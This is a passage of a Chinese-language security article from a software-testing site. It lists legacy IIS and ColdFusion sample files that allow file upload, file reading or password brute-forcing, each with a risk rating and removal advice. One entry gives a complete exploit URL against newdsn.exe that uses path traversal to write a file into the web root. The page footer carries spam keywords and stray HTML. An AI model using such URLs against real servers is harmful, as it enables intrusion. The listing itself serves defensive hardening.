        可用帳號,哪怕是Guest帳號,就可以上傳任何文件到你的web目錄,
        除了替換主頁外,他更可以進一步控制你的整個系統!
    建議:刪除名為/scripts的web目錄
    解決方法:刪除uploadn.asp文件
    相關連接:

    類型:攻擊型
    名字:uploadx.asp
    風險等級:高
    描述:在/scripts/tools目錄下存在uploadx.asp程序,只要入侵者有一個
        可用帳號,哪怕是Guest帳號,就可以上傳任何文件到你的web目錄,
        除了替換主頁外,他更可以進一步控制你的整個系統!
    建議:刪除名為/scripts的web目錄
    解決方法:刪除uploadx.asp文件
    相關連接:

    類型:攻擊型
    名字:query.asp
    風險等級:低
    描述:在/IISSAMPLES/ExAir/Search/的目錄下存在query.asp文件,這個
        文件有個漏洞如果被攻擊者利用,后果將導致CPU使用率達到100%,
        機器速度將明顯變慢
    建議:禁止對/iissamples目錄的存取
    解決方法:刪除query.asp文件

    71
    類型:攻擊型
    名字:advsearch.asp
    風險等級:低
    描述:在/IISSAMPLES/ExAir/Search/的目錄下存在query.asp文件,這個
        文件有個漏洞如果被攻擊者利用,后果將導致CPU使用率達到100%,
        機器速度將明顯變慢
    建議:禁止對/iissamples目錄的存取
    解決方法:刪除advsearch.asp文件

    類型:攻擊型
    名字:search.asp
    風險等級:低
    描述:在/IISSAMPLES/ExAir/Search/的目錄下存在search.asp文件,這個
        文件有個漏洞如果被攻擊者利用,后果將導致CPU使用率達到100%,
        機器速度將明顯變慢
    建議:禁止對/iissamples目錄的存取
    解決方法:刪除search.asp文件

    類型:攻擊型
    名字:getdrvrs.exe
    風險等級:中
    描述:這個存在于/scripts/tools目錄下的getdrvrs.exe文件允許任何一
        個用戶在web根目錄下創建任何文件,和創建ODBC數據源
    建議:禁止對/scripts/tools目錄的匿名訪問
    解決方法:刪除getdrvrs.exe文件

    類型:攻擊型
    名字:newdsn.exe
    風險等級:中
    描述:這個存在于/scripts/tools目錄下的newdsn.exe文件允許任何一個
        用戶在web根目錄下創建任何文件,如:
    http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft
    %2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft
    &dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr=
    建議:禁止對/scripts/tools目錄的匿名訪問
    解決方法:刪除newdsn.exe文件

    類型:信息型
    名字:showcode.asp_3
    風險等級:中
    描述:在/iissamples/exair/howitworks/存在code.asp文件,入侵者利用
        該文件可以查看服務器硬盤上任何一個ASCII文件的內容,并顯示asp
        程序文件的源代碼
    建議:禁止對/iissamples的web目錄的匿名訪問
    解決方法:刪除showcode.asp文件

    類型:攻擊型
    名字:aexp.htr
    風險等級:中
    描述:在/iisadmpwd目錄下存在aexp.htr文件,類似的還有aexp2.htr,
        aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破
        解和修改NT用戶的密碼。
    建議:建議禁止對/iisadmpwd目錄的訪問
    解決方法:刪除aexp.htr文件

    類型:攻擊型
    名字:aexp2.htr
    風險等級:中
    描述:在/iisadmpwd目錄下存在aexp2.htr文件,類似的還有aexp2.htr,
        aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破
        解和修改NT用戶的密碼。
    建議:建議禁止對/iisadmpwd目錄的訪問
    解決方法:刪除aexp2.htr文件

    類型:攻擊型
    名字:aexp3.htr
    風險等級:中
    描述:在/iisadmpwd目錄下存在aexp3.htr文件,類似的還有aexp2.htr,
        aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破
        解和修改NT用戶的密碼。
    建議:建議禁止對/iisadmpwd目錄的訪問
    解決方法:刪除aexp3.htr文件

    類型:攻擊型
    名字:aexp4b.htr
    風險等級:中
    描述:在/iisadmpwd目錄下存在aexp4b.htr文件,類似的還有aexp2.htr,
        aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破
        解和修改NT用戶的密碼。
    建議:建議禁止對/iisadmpwd目錄的訪問
    解決方法:刪除aexp4b.htr文件

    類型:攻擊型
    名字:achg.htr
    風險等級:中
    描述:在/iisadmpwd目錄下存在aechg.htr文件,類似的還有aexp2.htr,
        aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破
        解和修改NT用戶的密碼。
    建議:建議禁止對/iisadmpwd目錄的訪問
    解決方法:刪除achg.htr文件

    類型:攻擊型
    名字:ExprCale.cfm
    風險等級:中
    描述:在Coldfusion的web目錄:/cfdocs/expeval/ExprCalc.cfm文件,這
        個文件有個漏洞允許用戶讀取服務器硬盤上的任意文件包括用戶密
        碼數據庫sam文件
    建議:刪除相關的文件
    解決方法:刪除ExprCalc.cfm文件

    類型:攻擊型
    名字:getfile.cfm
    風險等級:中
    描述:在Coldfusion的web目錄:/getfile.cfm文件,這個文件有個漏洞允
    許用戶讀取服務器硬盤上的任意文件包括用戶密碼數據庫sam文件
    建議:刪除相關的文件
    解決方法:刪除getfile.cfm文件

    類型:信息型
    名字:x.htw
    風險等級:中
    描述:IIS4.0上有一個應用程序映射htw--->webhits.dll,這是用于Inde
        xServer的點擊功能的。盡管你不運行IndexServer,該映射仍然有
        效。這個應用程序映射存在漏洞,允許入侵者讀取本地硬盤上的文
        件,數據庫文件,和ASP源代碼。
    建議在IIS控制臺中刪除無用的應用程序映射

    類型:信息型
    名字:qfullhit.htw
    風險等級:中
    描述:IIS4.0上有一個應用程序映射htw--->webhits.dll,這是用于Inde
        xServer的點擊功能的。盡管你不運行IndexServer,該映射仍然有
        效。這個應用程序映射存在漏洞,允許入侵者讀取本地硬盤上的文
        件,數據庫文件,和ASP源代碼。
    建議:建議在IIS控制臺中刪除無用的應用程序映射

    類型:信息型
    名字:iirturnh.htw
    風險等級:中
    描述:IIS4.0上有一個應用程序映射htw--->webhits.dll,這是用于Inde
        xServer的點擊功能的。盡管你不運行IndexServer,該映射仍然有
        效。這個應用程序映射存在漏洞,允許入侵者讀取本地硬盤上的文
        件,數據庫文件,和ASP源代碼。
    建議:建議在IIS控制臺中刪除無用的應用程序映射

    文章來源于領測軟件測試網 http://www.kjueaiud.com/


    關于領測軟件測試網 | 領測軟件測試網合作伙伴 | 廣告服務 | 投稿指南 | 聯系我們 | 網站地圖 | 友情鏈接
    版權所有(C) 2003-2010 TestAge(領測軟件測試網)|領測國際科技(北京)有限公司|軟件測試工程師培訓網 All Rights Reserved
    北京市海淀區中關村南大街9號北京理工科技大廈1402室 京ICP備2023014753號-2
    技術支持和業務聯系:info@testage.com.cn 電話:010-51297073

    軟件測試 | 領測國際ISTQBISTQB官網TMMiTMMi認證國際軟件測試工程師認證領測軟件測試網

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>